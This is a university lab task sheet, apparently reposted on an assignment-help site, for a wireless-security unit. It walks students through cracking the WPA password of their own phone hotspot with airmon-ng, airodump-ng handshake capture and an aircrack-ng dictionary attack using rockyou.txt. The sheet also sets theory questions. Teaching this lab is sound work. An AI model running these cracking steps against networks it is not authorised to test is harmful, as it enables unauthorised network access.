Real World Practices for Cyber Security | My Assignment Tutor

WEEK 8 – TASK 8.2PPass Task.Release Date: 10 May, Due Date: 24 May, End Date: 31 May.Learning OutcomesIn this task, you will learn about security of wireless networks.InstructionsAn answer sheet template is available on OnTrack as a `Resources’. Pleasedownload the answer sheet and fill it with your answers. To upload on OnTrack, youneed to convert the answer sheet template document to PDF. MS Word includesbuilt-in PDF conversation capability.All questions and their sub-questions of this task must be attempted. If screenshots arerequired, please ensure that the text in screenshots is readable.Remember that troubleshooting technical problem is part of learning in this field. Youmust patiently work through issues and solve these. Tasks are not a step-by-step guide. Youneed to be in the driver seat and learn concepts by doing – as you would when you start yourfuture job (many times, even your future supervisor doesn’t know the answer to problemsyou face). After patent troubleshooting and research, if you need help:Help is always available in SIT182. Please go to Discussions and ask your questionsabout this task in Task 8.2P. All students are encouraged to participate and help peerswith their questions. Helping others is a great way to learn and think about aspectsyou may have overlooked. You can also seek help from tutors during online and faceto-face pracs. Please do not raise your questions through Teams, OnTrack, or Email.References In cyber security, our preferred referencing style is IEEE – however, you areallowed to use any Deakin approved referencing style in this unit. Please refer to unit site >Content > Referencing – Hints & Tips for more information.SIT182 – Real World Practices for Cyber SecurityOntrack.deakin.edu.auE 2nsure that you review the cryptography concepts covered in Week 7 and 8 oflectures. This task complements the theoretical concepts covered in Week 9’s lecture(Wireless Network Security). This task is covered in Week 10 pracs (online and inperson).This trimester we have students across the world studying this unit online. As a result,some students have had difficulty purchasing the required wireless adapter for this task.In order to allow all students a fair chance to complete the unit, we are providing twooptions to complete this task (completing the task through either of the options has noimpact on your final grade). Option 1 enhances your hand-on knowledge and Option 2enhances your theoretical knowledge and advances your preparation for job interviews.Option 1: If you have managed to purchase ALFA wireless adapter (AWUS036NHA) orequivalent monitor-mode capable adapter, then we suggest that you opt for option 1.Option 2: If you have not managed to purchase the adapter, please opt for option 2.Option 1An overview of WEP and WPA protocols is presented in Week 9 lecture. You onlyneed to know about WEP and WPA protocols to the extent covered in lectures foryour final exam. The following pages include some more detailed information aboutWEP and WPA/WPA2 for those interested.Wired Equivalent Privacy (WEP) is a security protocol specified in the IEEE802.11b for providing a WLAN with a level of security and privacy comparable to thatof a wired network. WEP assumes all STAs share a secret key. WEP authentication, asSIT182 – Real World Practices for Cyber SecurityOntrack.deakin.edu.au3illustrated above, is for the STA to prove that it possesses the shared key (i.e., that itis a legitimate device).WEP has many weaknesses, including 1) Key management is not specified in the WEPstandard, 2) The Initialization Vector (IV) is Too Small, 3) The Integrity Check Value(ICV) algorithm is not appropriate, 4) WEP’s use of RC4 (a stream cipher) is weak, and5) Authentication message can be forged.You will find many resources about WEP protocol and how to break WEP online. Hereis a video describing video on YouTube:https://www.youtube.com/watch?v=Fr84Y1ur5dcIn this task, we will not focus on WEP. This is because very few routers use WEP (manyrecent router firmware’s do not even support WEP). If you have an old WEP-capablerouter at home, you can follow the many tutorials that are available online and hackyour own WEP network.Here is one example tutorial: https://diarium.usal.es/pmgallardo/2020/10/02/howto-crack-a-wep-password-using-aircrack-ng/.If you are aiming for Distinction and looking for an idea to complete the `somethingawesome’ task, you can set up your own WEP wireless network (with your own definedkey) and hack the network (i.e., retrieve the password as an attacker who does nothave the network key and wants to find it).WEP to WPA/WPA2:WPA was developed as a temporary solution to fix WEP and while WPA2 wasbeing developed. WPA was compatible with existing hardware that supportedWEP. For example, WPA uses Temporal Key Integrity Protocol (TKIP) for RC4compatibility. However, every packet is encrypted with a unique encryption key.TKIP uses a cryptographic mixing function to combine a temporal key, the TA(transmitter MAC address), and the sequence counter into the WEP seed (128bits). Pre-Shared Key (PSK) aka. WPA-Personal is very much similar to the WEPkey, but it is not used for encryption. Instead, PSK serves as the seed for hashingthe per-frame key. They are the starting point for deriving different encryptionkeys for each connected PC. WPA extended IV to 48-bits, which would take morethan 100 years to repeat IV. Moreover, IV and Key are mixed in a moreSIT182 – Real World Practices for Cyber SecurityOntrack.deakin.edu.au4complicated way than a mere XOR. Figure 1 gives a recap of WEP and WPAsecurity:Figure 1 WEP vs WPAHowever, due to inherent weaknesses in RC4 and other flaws, attacks are stillpossible.The attack against WPA: PSK is a 256-bit value known to every device in theWLAN. For WPA it is the shared key installed manually. When using WPA orWPA2, at the beginning of the connection, the AP initiates a four-way handshaketo derive the keys for this session. We provide a simplified summary of the fourway handshake in the following. The handshake must be completed, and a newtemporary session key must be in place before any encrypted data can actuallybe exchanged between the station and AP.The handshake works as follows:• The AP and each station need an individual Pairwise Transient Key (PTK)to protect unicast communication between them. To derive a differentPTK for each AP/station pair, a Pairwise Master Key (PMK), which is usuallythe PSK for WPA, i s fed into an algorithm, along with two values, ANonceand SNonce, random numbers generated by a station (e.g., Laptop) and thereceiver (a base-station). Messages #1 and #2 in Figure 2 illustrate how theAP and station manage to derive the same PTK without ever sending it overthe air.• To stop these handshake messages from being forged, messages #2through #4 carry a Message Integrity Code (MIC). Each MIC is generatedSIT182 – Real World Practices for Cyber SecurityOntrack.deakin.edu.au5by hashing a specified part of the message, then encrypting that hash withthe PTK. Please ignore the group key GTK for now.If an attacker captures the handshake packets, it is possible to crack the WPA PSK ifa weak shared key is issued. For every possible PSK, the attacker computes the PTKusing the Nonces obtained from the handshake and then computes the MIC. Ifthe computed MIC is the same as the MIC captured from the handshake, it meansthat the PSK was found.Unlike WEP, where statistical methods can be used to speed up the crackingprocess, only plain brute force techniques can be used against WPA/WPA2. Thatis, because the key is not static, so collecting IVs like when cracking WEP encryptiondoes not speed up the attack. Brute-forcing the PSK can be very time consuming,so dictionary attacks can be used. Dictionary attacks are not effective againststrong keys (more than 12 characters with a combination of letters, numbers andsymbols) but they can be very fast against keys that represent plain words,telephone numbers or other non-random keys. The bottom part shows how eachside generates the PTK by using a concatenation of the ANonce, SNonce, thesender/receiver MAC addresses through a pseudo-Random number function (PRF).Figure 2There are many resources available about WPA online. Here is an interesting videosummary comparing the different variant of WPA:https://www.youtube.com/watch?v=hLQ5rYNUwNgSIT182 – Real World Practices for Cyber SecurityOntrack.deakin.edu.au6Let’s get our hands dirty and have a little fun!You want to set up a WPA network and then use Kali VM equipped with ALFA wirelessadapter (or any other “monitor-mode” capable wireless adapter that you may havepurchased1) and extract the WPA key that the network uses.Important: In Task 7.1P, you changed the repository for your Kali Linux VM. This wasto allow you to install Snort from the Ubuntu repository. With the changed repository,you will not be able to complete this task. You have 2 options. A) Restoring the KaliVM to the status of the snapshot you took at the start of Task 7.1P, which you called“Before Snort Installation”. For this, locate the snapshot for Kali VM and click on“Restore”.Figure 3B) If you did not take a snapshot of the VM at the start of Task 7.1P, you can redownload Kali VM for VirtualBox from the links available in Task 1.4P and import it.1. Ensure that you have installed VirtualBox Extension Pack. This was requiredwhen you installed Kali VM for the first time in Task 1.4P. The Extension Pack isavailable from the following link and can be easily installed after downloading:https://www.virtualbox.org/wiki/DownloadsIf you are using VMWare or Parallels, you may need to check that your Kali VM iscapable of using USB devices plugged into your host OS.1 Reminder: if you do not have the wireless adapter for any reason, you can complete this task throughOption 2 (available later in this document).SIT182 – Real World Practices for Cyber SecurityOntrack.deakin.edu.au72. Ensure that your Kali VM is connected to the Internet. Similar to previous tasks,click on Network and ensure that the settings look similar to Figure 4.Figure 43. Log in to Kali VM using kali as username and password. It is very likely that yourALFA adapter is not active yet, and the light on it is not blinking (if it is, you canskip this step). To fix this issue, we need to install the required firmware to makethe ALFA adapter work with provided Kali VM image. Run Terminal in Kali VMand execute the following commands (see Figure 5):sudo apt-get updatesudo apt-get install firmware-atherosFigure 5SIT182 – Real World Practices for Cyber SecurityOntrack.deakin.edu.au8After installing the firmware, “Shut Down” your Kali VM (see Figure 6).Figure 64. Plug your ALFA Wireless adapter to your host OS using USB. Next, click on“Settings” for Kali VM. Retrieve “Ports” and under “USB” ensure “Enable USBController” is active and the “USB 2.0” option is selected. Click on the “AddUSB” icon (as shown in Figure 4) and add your ALFA wireless adapter by selectingit from the list of devices shown. Your settings should be similar to Figure 6. Afterthis, you can click OK and start Kali VM. Note that it is very likely that your ALFAdevice will be recognised either as “ATHEORS” or “Realtek”. If you do not seeany of these appearing, unplug and plug the adapter a few times and notice whatnew device is recognised in the list – that d,evice whatever it may be recognisedas, is your ALFA wireless device. If you are using other devices (i.e., you purchaseda monitor-mode capable wireless device that is not the recommended ALFAWireless adapter), you will need to identify your device from the list the same way.SIT182 – Real World Practices for Cyber SecurityOntrack.deakin.edu.au9Figure 7Figure 8Figure 9SIT182 – Real World Practices for Cyber SecurityOntrack.deakin.edu.au105. Once you log in to Kali VM, you should see the light on the adapter turned on.This will indicate the adapter is now working fine. If the light of the adapter didnot turn on, restart Kali VM and unplug the adapter from the USB port of yourhost. Turn on Kali VM and plug the adapter back into your host machine. Rightclick on USB and select the ALFA Wireless Adapter to plug it into your Kali VM(see Figure 10).Figure 10This should resolve issues in most cases. However, if your issue persists, try tounplug, turn off Kali VM and your host OS, and try again. Try to patientlytroubleshoot a few times, and it will eventually work. Remember thattroubleshooting technical problem is part of the learning process in units likeSIT182.6. Once you get the adapter up and running, you will be able to use it to browsenearby Wireless Networks in Kali VM (see Figure 11). This confirms that youradapter is working.Figure 11Click on the networkicon in Kali VM toptoolbar.SIT182 – Real World Practices for Cyber SecurityOntrack.deakin.edu.au117. Download the “rockyou.txt” file using any of the following links inside your KaliVM and save it to Desktop.Dropbox:https://www.dropbox.com/s/rtiktsw1vm5nqb3/rockyou.txtCloudStor:https://cloudstor.aarnet.edu.au/plus/s/fPj3e9TNzMpzI7UGoogle Drive:https://drive.google.com/file/d/1rrcyOPEX6VU4u6Qgn4IorfSNUxxAlH04/view8. Run the following command in Terminal of Kali VM. The output of running thecommand should be similar to Figure 12.sudo apt install wireless-toolsFigure 12SIT182 – Real World Practices for Cyber SecurityOntrack.deakin.edu.au129. Run the following command in your Kali VM Terminal.sudo iwconfigFigure 13Question 1: Referring to the output shown after running the command of Step 9, what isthe meaning of the following values shown for wlan0 interface:“ESSID: off/any”“Access Point: Not-Associated”“Tx-Power= 20 dBm”You may need to answer this question by searching through resources online.Ensure that you include reference(s) for your answer.10.Run the following command in your Kali VM Terminal.sudo airmon-ngFigure 14Please note: In this case, the interface name is wlan0, but yours may be different.11. Run the following command in your Kali VM Terminal to enable “monitormode”.sudo airmon-ng start wlan0SIT182 – Real World Practices for Cyber SecurityOntrack.deakin.edu.au13Figure 15Please note that you may need to adjust this interface name (i.e., wlan0). Forexample, your interface could be recognised as wlan1, etc.As shown in the output messages, there are processes that we need to kill beforewe can enable monitor-mode. Run the following command in your Kali VMTerminal:sudo airmon-ng check killFigure 16Let’s double check if all processes interfering with monitor-mode have beendisabled.sudo airmon-ng checkFigure 17No errors are shown (blank output), so we are now ready to turn on the monitormode. Run the following command:SIT182 – Real World Practices for Cyber SecurityOntrack.deakin.edu.au14sudo airmon-ng start wlan0Figure 18You will notice that wlan0 interface shown in Figure 15 is now changed towlan0mon.Note: your monitor-mode interface name may be different. Adjust the commandsusing wlan0mon from here on accordingly.Let’s run iwconfig command again and check our network settings:sudo iwconfigFigure 19Compare the output shown in Figure 19 with Figure 13.(see next page)SIT182 – Real World Practices for Cyber SecurityOntrack.deakin.edu.au1512.Time to view the wireless networks near you. Run the following command in yourKali VM Terminal.sudo airodump-ng wlan0monFigure 20After a minute, press Ctrl + C to stop the listing. You are reminded that the aboveinformation will be different for different APs and wireless adapters and the outputshown in Figure 20 is only a sample.Question 2:A) Referring to the output shown in Figure 20, what is the meaning of the followingvalues shown:BSSID and ESSIDSIT182 – Real World Practices for Cyber SecurityOntrack.deakin.edu.au16PWRSTATIONCHENC#DATAB) True or False? “a higher absolute value for PWR indicates that the ESSID is in acloser proximity to your ALFA wireless adapter.”C) Include a screenshot of running the airodump-ng command as shown in Step 12.Ensure at least one BSSID and ESSID value is shown. If there are no wirelessnetworks near you, turn on the hotspot on your phone and run the command.Setting up your Target Network: Now that you have managed to configure Kali VMand enable “monitor-mode” for your ALFA wireless adapter, it is time to preparethe target network. For your target network, you will be using your phone and itsWi-Fi hotspot functionality. Change your hotspot Wi-Fi Password to baseball.Figure 21Name of WirelessNetwork for hotspot is“Arash’s iPhone”Name of WirelessNetwork for thishotspot is “GalaxyA31B641”Ensure this option isactiveSIT182 – Real World Practices for Cyber SecurityOntrack.deakin.edu.au17To enable hotspot on iPhone, you can use the following guide:https://support.apple.com/en-au/HT204023To enable hotspot on an Android phone, you can use the following guide:https://www.androidauthority.com/mobile-hotspot-setup-631280/Question 3: What is the name of network for the hotspot you created using yourmobile phone’s hotspot functionality?13. For this task sheet, we are targeting “Galaxy A31B64” as target network AccessPoint (AP). In other words, this AP is the network we are targeting to hack andretrieve the password for. Let’s run airodump command again in Kali VMTerminal. This time ensure that you retrieve the information for the targetnetwork you created using your phone (i.e., the one you refer to in Question 3).sudo airodump-ng wlan0monFigure 22Please note that you will need to target the network you create using your phonehotspot. Hence, your results will be different for the above command and thecommands you will execute from this point onwards need to be adjusted.SIT182 – Real World Practices for Cyber SecurityOntrack.deakin.edu.au18Question 4: Include a screenshot showing that you have run the command in Step13, which includes the ESSID of the AP you created using your phone’s hotspotfunctionality (i.e., the name you provide in Question 3 must be shown).14.Start airodump-ng to collect the 4-way authentication handshake for the targetAccess Point (AP). The syntax for the command is as follows:sudo airodump-ng -c “channel no.” –bssid “AP MAC address” -w “Path to file tostore IVs” “monitor mode interface”• -c is the channel of the wireless network• -w defines the filename for the file which will contain the handshakeFor instance, in this case, we are targeting “Galaxy A31B641” and the command isadjusted as follows:sudo airodump-ng -c 6 –bssid 1E:4E:16:05:B6:41 -w Desktop/WPA wlan0monYou are reminded once again that you need to adjust the parameters depending onthe AP you are targeting and the values you see for your target AP.Figure 23Leave the capture running.In Figure 23, there are currently no legitimate clients connected to the AP. Asmentioned earlier, to attack a WPA network, we need to capture a handshake. Forthis, a legitimate client needs to connect to the target AP. This will allow you (i.e.,the attacker in this case) to capture the handshake.SIT182 – Real World Practices for Cyber SecurityOntrack.deakin.edu.au19You can connect to your phone AP using any other device that you may have.Alternative, you can connect to the target AP from your host OS (i.e., not Kali VM).In this case, for instance, we join “Galaxy A31B541” from the host OS as we wouldjoin any other wireless network.15.As the attacker, we were intercepting traffic between the client (our host OS) andthe target AP using ALFA wireless adapter in monitor-mode with the commandused in Step 14. This allowed us to capture the handshake.Figure 24WPA handshake: 1E:4E:16:05:B6:41Please be reminded that the handshake you captured will have different values.Also, if after connecting to AP handshake was not shown, try to reconnect a fewtimes.Question 5: Include a screenshot that indicates you have run the command in Step14, and you have captured WPA handshake as shown in Figure 24.16.The final step is to try to crack the key based on the collected handshake. To doso you must use a dictionary file. The default aircrack-ng installation contains abasic dictionary, but more complete and extensive dictionaries can be also used.The command you need to use has the following syntax:sudo aircrack-ng -w “Path to password list” -b “AP MAC address” “Path to file tostore IVs*.cap “SIT182 – Real World Practices for Cyber SecurityOntrack.deakin.edu.au20• –w is the filename of the dictionary• –bis theBSSID oftheAP• *.cap are the files that contain the handshakeWe will use the “rockyou.txt” you downloaded in Step 7 as the dictionary file.Remember that you stored it on your Desktop. The BSSID of AP refers to BSSID ofyour target network. The “.cap” files contain what you captured in Step 14.Remember that you are also storing the .cap files on Desktop.In our case, the command we use to run a dictionary attack against the “GalaxyA31B541” network is as follows:sudo aircrack-ng -w Desktop/rockyou.txt -b 1E:4E:16:05:B6:41 Desktop/*.capYou just managed to crack a WPA network!Question 6:A) Include a screenshot of the commands you used in Step 16.B) Include a screenshot of the output you receive after executing the commandin Step 16 (the screenshot should indicate that you have successfullycaptured the packet).C) Why is a dictionary file (rockyou.txt) needed when attacking a WPA network?SIT182 – Real World Practices for Cyber SecurityOntrack.deakin.edu.au21D) If we had used a password such as “*&^%FASDnhu812” could we havecracked the password using rockyou.txt dictionary file?E) What is the difference between WPA and WPA2?Congratulations! This was the last Pass task for SIT182. We hope you enjoyed it.There is so much more in wireless network security that you will learn about in yourfuture units.Option 22Question 1: Put your researcher cap on and answer the following common interviewquestions related to Wireless Network Security. You are expected to find the answerto these questions and explain them in your own words. You are expected to list 2references for each – Wikipedia and your lecture notes are not allowed. You may findthe textbooks available in “Reading List” of SIT182 unit site (available under“Content”) useful when finding the answer to these questions. -10% of the specifiedword count and up to +50% of it is OK – i.e., don’t worry about word limit and focuson learning!A) What is a Rogue Access Point (AP)? Briefly explain 2 different approaches todetect a rogue AP. In your answer ensure that you discuss whether you thinka rouge AP is a security vulnerability and how may an attacker exploit a rogueAP. (300 words)B) What is WiFi Protected Setup (WPS)? Which of the following WPS methods isvulnerable? Push-button method, PIN method, Piconet method, NFCmethod. (200 words)C) Which one is more secure: WEP, WPA, or WPA2? Explain 2 vulnerabilities ofWPA that led to the development of WPA2. (300 words)D) Discuss how Mac Address Filtering may be used to secure a wireless networkagainst threats? (200 words)E) Briefly discuss what an Evil Twin AP attack is? (200 words)F) Near Field Communication (NFC) is used for contactless payment systems.List and briefly explain 3 different vulnerabilities for NFC. (200 words)2 You are not required to know the extra theoretical content you learn about in Option 2 for the final exam.SIT182 – Real World Practices for Cyber SecurityOntrack.deakin.edu.au22Congratulations! This was the last Pass task for SIT182. We hope you enjoyed learningmore about wireless network security and feel more confident about your futureinterviews. There is so much more in wireless network security that you will learn aboutin your future units. Don’t forget about submitting your learning portfolio aftercompleting all the tasks. There will be a Pass task available on OnTrack providing youwith more information on how to do this.

QUALITY: 100% ORIGINAL PAPER – NO PLAGIARISM – CUSTOM PAPER

Leave a Reply

Your email address will not be published. Required fields are marked *